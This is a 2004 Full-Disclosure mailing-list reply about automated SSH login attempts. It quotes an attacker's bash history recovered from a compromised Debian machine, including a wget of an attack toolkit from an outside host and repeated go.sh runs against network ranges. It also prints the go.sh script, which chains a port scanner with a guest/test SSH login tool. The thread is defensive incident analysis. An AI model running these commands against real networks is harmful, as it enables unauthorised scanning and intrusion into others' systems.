[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200407292254.03726.andrei@fq.ro>
From: andrei at fq.ro (Andrei Galca-Vasiliu)
Subject: Re: Automated SSH login attempts?
By the way, you have to be root to use "ss":
sweet@...rei:~/ssh$ ./go.sh 82.77.45
scanning network 82.77.*.*
usec: 30000, burst packets 50
using inteface eth0
ERROR: UID != 0
Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek
povestea:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
> Whoever broke into the machine did not take any attempts to cover up his
> tracks - this is what I found in /root/.bash_history:
>
> ------
> id
> uname -a
> w
> id
> ls
> wgte frauder.us/linux/ssh.tgz
> wget frauder.us/linux/ssh.tgz
> tar xzvf ssh.tgz
> tar xvf ssh.tgz
> ls
> cd ssh
> ls
> ./go.sh 195.178
> ls
> pico uniq.txt
> vi uniq.txt
> ls
> rm -rf uniq.txt
> ./go.sh 167.205
> ls
> rm -rf uniq.txt vuln.txt
> ./go.sh 202.148.20
> ./go.sh 212.92
> ./go.sh 195.197
> ./go.sh 147.32
> ./go.sh 213.168
> ./go.sh 134.176
> ./go.sh 195.83
> ------
>
> um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> binaries:
>
> go.sh:
> -------
> ./ss 22 -b $1 -i eth0 -s 6
> cat bios.txt |sort | uniq > uniq.txt
> ./sshf
> -------
>
> * 'ss' apparently is some sort of portscanner
> * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> 'test' first, then as user 'guest' (according to tcpdump).
>
> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> As already mentioned, I am far from being an expert, but if I can assist
> in further testing, then let me know. Please CC me, I am not subscribed
> to the list.
>
> cheers,
> Stefan
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
--
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro
Security is an illusion...
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
Powered by blists - more mailing lists